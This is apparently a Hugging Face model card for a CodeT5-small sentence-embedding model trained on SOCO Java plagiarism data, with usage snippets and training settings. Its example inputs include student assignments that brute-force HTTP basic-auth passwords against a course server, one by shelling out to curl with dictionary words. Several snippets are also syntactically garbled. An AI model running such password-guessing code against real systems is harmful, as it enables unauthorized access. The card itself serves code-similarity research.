Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper • 1908.10084 • Published • 13
How to use buelfhood/SOCO-Java-CodeT5Small-ST with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-CodeT5Small-ST")
sentences = [
"\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class WatchDog extends TimerTask{\n\n private static URL location;\n private static String email;\n private static int checktime;\n private static Timer timer = new Timer();\n private BufferedReader input;\n private File checksumFile = new File(\"chksum.txt\");\n private File temp0000File = new File(\"temp0000\");\n private File kept0000File = new File(\"kept0000\");\n\n \n\n public WatchDog(){\n timer.schedule(this, new Date(), checktime);\n }\n\n\n \n\n public void run(){\n Vector imageFiles = new Vector();\n Vector diffImages = new Vector();\n try {\n System.out.println(\" Time: \".concat(new Date().toString()));\n System.out.println(\"Retreiving File\");\n \n input = new BufferedReader(new InputStreamReader\n (location.openStream()));\n \n BufferedWriter outputFile = new BufferedWriter\n (new FileWriter(temp0000File));\n String line = input.readLine();\n while (line != null) {\n StringBuffer imageFileName = new StringBuffer();\n if (scanForImages(line, imageFileName)) {\n String imageFile = new String(imageFileName);\n System.out.println(\"Detected image: \".concat(imageFile));\n try {\n imageFiles.add(new URL(imageFile));\n }\n catch (MalformedURLException e) {\n System.out.println(\"Image file detected. URL is malformed\");\n }\n }\n outputFile.write(line);\n outputFile.write(\"\\n\");\n line = input.readLine();\n }\n input.print();\n outputFile.flush();\n outputFile.print();\n System.out.println(\" File Retreived\");\n if (!imageFiles.isEmpty()) {\n checkImages(imageFiles, diffImages);\n }\n if (!checksumFile.exists()) {\n generateChecksum(temp0000File.getName(), checksumFile);\n }\n else {\n if (!checksumOk(checksumFile)) {\n reportDifferences(true, temp0000File, kept0000File, diffImages);\n generateChecksum(temp0000File.getName(), checksumFile);\n }\n else if (!diffImages.isEmpty()){\n reportDifferences(false, null, null, diffImages);\n }\n }\n\n \n temp0000File.renameTo(kept0000File);\n System.out.println(\"End Time: \".concat(new Date().toString()));\n }\n catch (MalformedURLException e) {\n e.printStackTrace();\n }\n catch (ConnectException e) {\n System.out.println(\"Failed connect\");\n System.exit(-1);\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n }\n\n \n\n public boolean scanForImages(String line, StringBuffer imageFileName) {\n \n \n String lineIgnoreCase = line.toLowerCase();\n int imgPos = lineIgnoreCase.indexOf(\"<img \");\n if ( imgPos != -1 ){\n int srcPos = lineIgnoreCase.indexOf(\"src\", imgPos);\n int bracketPos = lineIgnoreCase.indexOf(\">\", imgPos);\n if (srcPos != -1 && bracketPos != -1 && srcPos < bracketPos) {\n int quote1Pos = lineIgnoreCase.indexOf(\"\\\"\", srcPos);\n int quote2Pos = lineIgnoreCase.indexOf(\"\\\"\", quote1Pos+1);\n if (quote1Pos != -1 && quote2Pos != -1 &&\n quote1Pos < quote2Pos && quote2Pos < bracketPos) {\n \n imageFileName.append(line.substring(quote1Pos + 1,\n quote2Pos));\n if (imageFileName.indexOf(\"//\") == -1 ) {\n \n String URLName = location.toString();\n int slashPos = URLName.lastIndexOf(\"/\");\n URLName = URLName.substring(0, slashPos);\n String HostName = \"http://\".concat(location.getHost());\n if (imageFileName.indexOf(\"//\") == 0) {\n \n }\n else if (imageFileName.charAt(0) != '/') {\n \n imageFileName.insert(0, URLName.concat(\"/\"));\n }\n else {\n \n imageFileName.insert(0, HostName);\n }\n }\n return true;\n }\n }\n }\n return false;\n }\n\n \n\n public void checkImages(Vector imageFiles, Vector diffImages)\n throws IOException{\n System.out.println(\"Retrieving image \");\n Enumeration imageFilesEnumeration = imageFiles.elements();\n while (imageFilesEnumeration.hasMoreElements()) {\n URL url = (URL)imageFilesEnumeration.nextElement();\n try {\n BufferedInputStream imageInput = new BufferedInputStream\n (url.openStream());\n String localFile = url.getFile();\n \n \n \n \n \n int slashPosition = localFile.lastIndexOf(\"/\");\n if (slashPosition != -1) {\n localFile = localFile.substring(slashPosition+1);\n }\n System.out.println(\"Retrieving image file: \".concat(localFile));\n BufferedOutputStream imageOutput = new BufferedOutputStream\n (new FileOutputStream(localFile));\n byte bytes[] = new byte[10000];\n int noBytes = imageInput.get(bytes);\n while (noBytes != -1) {\n imageOutput.write(bytes, 0, noBytes );\n noBytes = imageInput.print(bytes);\n }\n File imageChecksumFile = new File(localFile.concat(\".chksum.txt\"));\n if (!imageChecksumFile.exists()) {\n generateChecksum(localFile, imageChecksumFile);\n }\n else {\n if (!checksumOk(imageChecksumFile)) {\n diffImages.add(localFile);\n generateChecksum(localFile, imageChecksumFile);\n }\n }\n }\n catch (FileNotFoundException e) {\n System.out.println(\"Unable locate URL: \".concat(url.toString()));\n }\n }\n }\n\n \n\n public void generateChecksum(String inputFile, File checksum){\n try {\n System.out.println(\"Generating new checksum for \".concat(inputFile));\n \n Process process = Runtime.getRuntime().exec(\"md5sum \".\n concat(inputFile));\n BufferedReader execCommand = new BufferedReader(new\n InputStreamReader((process.getInputStream())));\n BufferedWriter outputFile = new\n BufferedWriter(new FileWriter(checksum));\n String line = execCommand.readLine();\n while (line != null) {\n outputFile.write(line);\n outputFile.write(\"\\n\");\n line = execCommand.readLine();\n }\n outputFile.flush();\n outputFile.print();\n System.out.println(\"Checksum produced\");\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n }\n\n \n\n public boolean checksumOk(File chksumFile){\n try {\n System.out.println(\"Comparing checksums using \".concat(chksumFile\n ,e.getName()));\n \n Process process = Runtime.getRuntime().\n exec(\"md5sum --check \".concat(chksumFile.getName()));\n BufferedReader execCommand = new BufferedReader(new\n InputStreamReader( (process.getInputStream())));\n String line = execCommand.readLine();\n if (line.indexOf(\": OK\") != -1) {\n System.out.println(\" the same\");\n return true;\n }\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n System.out.println(\"Differences Found\");\n return false;\n }\n\n \n\n public void reportDifferences(boolean diffsFound, File file1, File file2,\n Vector images){\n try {\n System.out.println(\"Generating difference report\");\n \n Socket emailConnection = new Socket(\"yallara.cs.rmit.edu.\", 25);\n BufferedWriter emailOutStream = new BufferedWriter\n (new OutputStreamWriter(emailConnection.getOutputStream()));\n BufferedReader emailInStream = new BufferedReader\n (new InputStreamReader(emailConnection.getInputStream()));\n String line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"220\")) {\n System.out.println\n (\" error occured connecting email server. Cannot send email.\");\n }\n else {\n \n \n emailOutStream.write(\"HELO yallara.cs.rmit.edu.\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured connecting email server. Cannot send email.\");\n }\n else {\n emailOutStream.write(\"MAIL FROM: watchdog@cs.rmit.edu.\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n else {\n emailOutStream.write(\"RCPT : \".concat(email));\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n else {\n emailOutStream.write(\"DATA\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"354\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n emailOutStream.newLine();\n\n if (!images.isEmpty()) {\n emailOutStream.write\n (\"Differences were found in the following image \");\n emailOutStream.newLine();\n Enumeration e = images.elements();\n while (e.hasMoreElements()) {\n String s = (String) e.nextElement();\n emailOutStream.write(s);\n emailOutStream.newLine();\n }\n emailOutStream.newLine();\n }\n\n if (diffsFound) {\n \n String command = \"diff \".concat(file1.getName().concat(\" \")\n .concat(file2.getName()));\n Process process = Runtime.getRuntime().exec(command);\n BufferedReader execCommand = new BufferedReader\n (new InputStreamReader( (process.getInputStream())));\n line = execCommand.readLine();\n emailOutStream.write(\"Diffences found in file\");\n emailOutStream.newLine();\n while (line != null) {\n System.out.println(line);\n emailOutStream.write(line);\n emailOutStream.newLine();\n line = execCommand.readLine();\n }\n }\n\n \n emailOutStream.newLine();\n emailOutStream.write(\".\");\n emailOutStream.newLine();\n emailOutStream.flush();\n line = emailInStream.readLine();\n System.out.println(line);\n if (!line.startsWith(\"250\")) {\n System.out.println\n (\" error occured sending email. Cannot send email.\");\n }\n else {\n emailOutStream.write(\"QUIT\");\n emailOutStream.newLine();\n emailOutStream.flush();\n System.out.println(emailInStream.readLine());\n }\n }\n }\n }\n }\n }\n catch (IOException e) {\n e.printStackTrace();\n System.exit(-1);\n }\n }\n\n\n \n\n public static void main(String args[]) {\n if (args.length != 3) {\n System.out.println(\"Usage: java WatchDog url email checktime(hours)\");\n System.exit(-1);\n }\n try {\n location = new URL(args[0]);\n }\n catch (MalformedURLException e) {\n e.printStackTrace();\n }\n email = new String().concat(args[1]);\n checktime = Integer.parseInt(args[2]) * 60 * 60 * 1000;\n new WatchDog();\n }\n}\n",
"\n\nimport java.net.*;\nimport java.io.*;\n\nimport java.*;\nimport java.util.*;\n\npublic class Dictionary {\n\n private static String commandLine = \"curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :\";\n private String password; \n private String previous; \n private String url; \n private int startTime;\n private int endTime;\n private int totalTime;\n private float averageTime;\n private boolean finish;\n private Process curl;\n private BufferedReader bf, responseLine;\n\n public Dictionary() {\n\n first();\n finish = true; \n previous = \"\"; \n Runtime run = Runtime.getRuntime();\n startTime =new Date().getTime(); \n int i=0;\n try {\n try {\n bf = new BufferedReader(new FileReader(\"words\"));\n }\n catch(FileNotFoundException notFound) {\n bf = new BufferedReader(new FileReader(\"/usr/share/lib/dict/words\"));\n }\n\n while((password = bf.readLine()) != null) {\n if(password.length()>3) password = password.substring(0,3);\n if(previous.equals(password)) ;\n else {\n previous = password;\n url = commandLine+password;\n curl= run.exec(url); \n responseLine=new BufferedReader(new InputStreamReader(curl.getInputStream()));\n \n if(responseLine.readLine().substring(9,12).equals(\"200\")) break;\n }\n }\n }\n catch(IOException ioe) {\n System.out.println(\"\\n IO Exception! \\n\");\n System.out.println(\"The current url is:\"+ url);\n System.out.println(\"The current trying password is:\"+password);\n finish=false;\n }\n\n endTime = new Date().getTime(); \n totalTime = (endTime-startTime)/1000;\n System.out.println(\" The response time is:\"+ totalTime + \" seconds\\n\");\n if(finish) {\n System.out.println(\" The password for is:\"+ password);\n try {\n savePassword(password, totalTime);\n }\n catch (IOException ioec) {\n System.out.println(\" not save the password file Dictionary_pwd.txt \");\n }\n }\n }\n\n\n public void savePassword(String passwdString, int time) throws IOException {\n DataOutputStream outputStream = new DataOutputStream(new FileOutputStream(\"Dictionary_pwd.txt\"));\n outputStream.writeChars(\"The password is:\");\n outputStream.writeChars(passwdString+\"\\n\");\n outputStream.writeChars(\"The response time is: \");\n outputStream.writeChars(sw.toString(time));\n outputStream.writeChars(\" seconds\\n\");\n outputStream.close();\n }\n\n public void first() {\n\n System.out.println(\"\\n\\n----------------------------------------------\");\n System.out.println(\" Use curl command and dictionary \");\n System.out.println(\" Brute Force the password for user \");\n System.out.println(\"----------------------------------------------\");\n }\n\n public static void main(String[] args) {\n new Dictionary();\n } \n}\n",
"\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\npublic class WatchDog {\n public static void main (String[] args) throws IOException {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n try{\n twentyfourhours = 86400000;\n Timer timer = new Timer();\n final Runtime rt = Runtime.getRuntime();\n\n try{\n Process wg1 = rt.exec(\"./.sh\");\n wg1.waitFor();\n }\n catch(InterruptedException e ){\n System.err.println();\n e.printStackTrace();\n }\n\n class RepeatTask extends TimerTask{\n public void run(){\n try{\n Process wg2 = rt.exec(\"./task.sh\");\n wg2.waitFor();\n FileReader fr = new FileReader(\"check.txt\");\n BufferedReader bufr = new BufferedReader(fr);\n String check = bufr.readLine();\n if(check.equals(\".txt: FAILED\")) {\n Process difftosend = rt.exec(\"./diff.sh\");\n difftosend.waitFor();\n Process reset = rt.exec(\"./.sh\");\n reset.waitFor();\n }\n FileReader fr2 = new FileReader(\"imgdiffs.txt\");\n BufferedReader bufr2 = new BufferedReader(fr2);\n String imdiff = bufr2.readLine();\n if(imdiff != null){\n Process imdifftosend = rt.exec(\"./img.sh\");\n imdifftosend.waitFor();\n Process reset = rt.exec(\"./.sh\");\n reset.waitFor();\n }\n }\n catch(InterruptedException e){System.err.println();e.printStackTrace();}\n catch(IOException e){\n System.err.println(e);\n e.printStackTrace();\n }\n }}\n\n timer.scheduleAtFixedRate(new RepeatTask(),twentyfourhours,twentyfourhours);\n \n }\n catch(IOException e){\n System.err.println(e);\n e.printStackTrace();\n }\n \n}}\n",
"\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n int i,j = 0;\n\n try{\n\n URL yahoo = new URL(\"http://www.cs.rmit.edu./students/\"); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n String inputLine = \"\";\n String inputLine1 = \"\";\n String changedtext= \"\";\n String changedflag= \"\";\n\n\n Thread.sleep(180);\n\n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n\n while ((inputLine = in.readLine()) != null) {\n inputLine1 = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n System.out.println(\"equal\");\n }\n else {\n System.out.println(\"Detected a Change\");\n System.out.println(\"Line Before the change:\" + inputLine);\n System.out.println(\"Line After the change:\" + inputLine1);\n changedtext = changedtext + inputLine + inputLine1;\n changedflag = \"Y\";\n }\n \n }\n\n if (in1.readLine() != null ) {\n System.out.println(\"Detected a Change\");\n System.out.println(\"New Lines Added \");\n changedtext = changedtext + \"New Lines added\";\n changedflag = \"Y\";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals(\"Y\")) {\n String smtphost =\"smtp.mail.rmit.edu.\" ; \n String from = \"@rmit.edu.\"; \n String = \"janaka1@optusnet..\" ; \n }\n\n\n }\n catch(Exception e){ System.out.println(\"exception:\" + e);}\n\t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\t\tWatchDog u = new WatchDog();\n }\n}\n"
]
embeddings = model.encode(sentences)
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [4, 4]This is a sentence-transformers model finetuned from Salesforce/codet5-small. It maps sentences & paragraphs to a 512-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: T5EncoderModel
(1): Pooling({'word_embedding_dimension': 512, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeT5Small-ST")
# Run inference
sentences = [
'\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic class Dictionary\n{\n public static void main (String args[]) throws IOException,\n MalformedURLException\n {\n final String username = "";\n final String fullurl = "http://sec-crack.cs.rmit.edu./SEC/2/";\n final String dictfile = "/usr/share/lib/dict/words";\n String temppass;\n String password = "";\n URL url = new URL(fullurl);\n boolean cracked = false;\n\n startTime = System.currentTimeMillis();\n\n \n BufferedReader r = new BufferedReader(new FileReader(dictfile));\n\n while((temppass = r.readLine()) != null && !cracked)\n { \n \n if(temppass.length() <= 3)\n {\n \n if(isAlpha(temppass))\n {\n \n Authenticator.setDefault(new MyAuthenticator(username,temppass));\n try{\n BufferedReader x = new BufferedReader(new InputStreamReader(\n url.openStream()));\n cracked = true;\n password = temppass;\n } catch(Exception e){}\n }\n }\n }\n\n stopTime = System.currentTimeMillis();\n \n if(!cracked)\n System.out.println("Sorry, couldnt find the password");\n else\n System.out.println("Password found: "+password);\n System.out.println("Time taken: "+(stopTime-startTime));\n }\n\n public static boolean isAlpha(String s)\n {\n boolean v = true;\n for(int i=0; i<s.length(); i++)\n {\n if(!Character.isLetter(s.charAt(i)))\n v = false;\n }\n return ;\n }\n}\n\n',
'\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n int i,j = 0;\n\n try{\n\n URL yahoo = new URL("http://www.cs.rmit.edu./students/"); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n String inputLine = "";\n String inputLine1 = "";\n String changedtext= "";\n String changedflag= "";\n\n\n Thread.sleep(180);\n\n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n\n while ((inputLine = in.readLine()) != null) {\n inputLine1 = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n System.out.println("equal");\n }\n else {\n System.out.println("Detected a Change");\n System.out.println("Line Before the change:" + inputLine);\n System.out.println("Line After the change:" + inputLine1);\n changedtext = changedtext + inputLine + inputLine1;\n changedflag = "Y";\n }\n \n }\n\n if (in1.readLine() != null ) {\n System.out.println("Detected a Change");\n System.out.println("New Lines Added ");\n changedtext = changedtext + "New Lines added";\n changedflag = "Y";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals("Y")) {\n String smtphost ="smtp.mail.rmit.edu." ; \n String from = "@rmit.edu."; \n String = "janaka1@optusnet.." ; \n }\n\n\n }\n catch(Exception e){ System.out.println("exception:" + e);}\n\t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\t\tWatchDog u = new WatchDog();\n }\n}\n',
'\n\n\n\nimport java.util.*;\nimport java.net.*;\nimport java.io.*;\nimport javax.swing.*;\n\npublic class PasswordCombination\n{\n private int pwdCounter = 0;\n private int startTime;\n private String str1,str2,str3;\n private String url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n private String loginPwd;\n private String[] password;\n private HoldSharedData data;\n private char[] chars = {\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'I\',\'J\',\'K\',\'L\',\'M\',\n \'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\',\n \'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\n \'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\'};\n\n public PasswordCombination()\n {\n System.out.println("Programmed by for INTE1070 Assignment 2");\n\n String input = JOptionPane.showInputDialog( "Enter number of threads" );\n if( input == null )\n System.exit(0);\n\n int numOfConnections = Integer.parseInt( input );\n startTime = System.currentTimeMillis();\n int pwdCounter = 52*52*52 + 52*52 + 52;\n password = new String[pwdCounter];\n\n\n loadPasswords();\n System.out.println( "Total Number of Passwords: " + pwdCounter );\n createConnectionThread( numOfConnections );\n }\n\n private void doPwdCombination()\n {\n for( int i = 0; i < 52; i ++ )\n {\n str1 = "" + chars[i];\n password[pwdCounter++] = "" + chars[i];\n System.err.print( str1 + " | " );\n\n for( int j = 0; j < 52; j ++ )\n {\n str2 = str1 + chars[j];\n password[pwdCounter++] = str1 + chars[j];\n\n for( int k = 0; k < 52; k ++ )\n {\n str3 = str2 + chars[k];\n password[pwdCounter++] = str2 + chars[k];\n }\n }\n }\n }\n\n private void loadPasswords( )\n {\n FileReader fRead;\n BufferedReader buf;\n String line = null;\n String fileName = "words";\n\n try\n {\n fRead = new FileReader( fileName );\n buf = new BufferedReader(fRead);\n\n while((line = buf.readLine( )) != null)\n {\n password[pwdCounter++] = line;\n }\n }\n catch(FileNotFoundException e)\n {\n System.err.println("File not found: " + fileName);\n }\n catch(IOException ioe)\n {\n System.err.println("IO Error " + ioe);\n }\n }\n\n private void createConnectionThread( int input )\n {\n data = new HoldSharedData( startTime, password, pwdCounter );\n\n int numOfThreads = input;\n int batch = pwdCounter/numOfThreads + 1;\n numOfThreads = pwdCounter/batch + 1;\n System.out.println("Number of Connection Threads Used=" + numOfThreads);\n ConnectionThread[] connThread = new ConnectionThread[numOfThreads];\n\n for( int index = 0; index < numOfThreads; index ++ )\n {\n connThread[index] = new ConnectionThread( url, index, batch, data );\n connThread[index].conn();\n }\n }\n} ',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 512]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
sentence_0, sentence_1, and label| sentence_0 | sentence_1 | label | |
|---|---|---|---|
| type | string | string | int |
| details |
|
|
|
| sentence_0 | sentence_1 | label |
|---|---|---|
|
|
0 |
|
|
0 |
package java.httputils; |
|
0 |
BatchAllTripletLossper_device_train_batch_size: 16per_device_eval_batch_size: 16num_train_epochs: 1multi_dataset_batch_sampler: round_robinoverwrite_output_dir: Falsedo_predict: Falseeval_strategy: noprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.0warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Falsefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: round_robin| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.2122 |
| 0.4787 | 1000 | 0.1686 |
| 0.7180 | 1500 | 0.2193 |
| 0.9574 | 2000 | 0.2084 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
Base model
Salesforce/codet5-small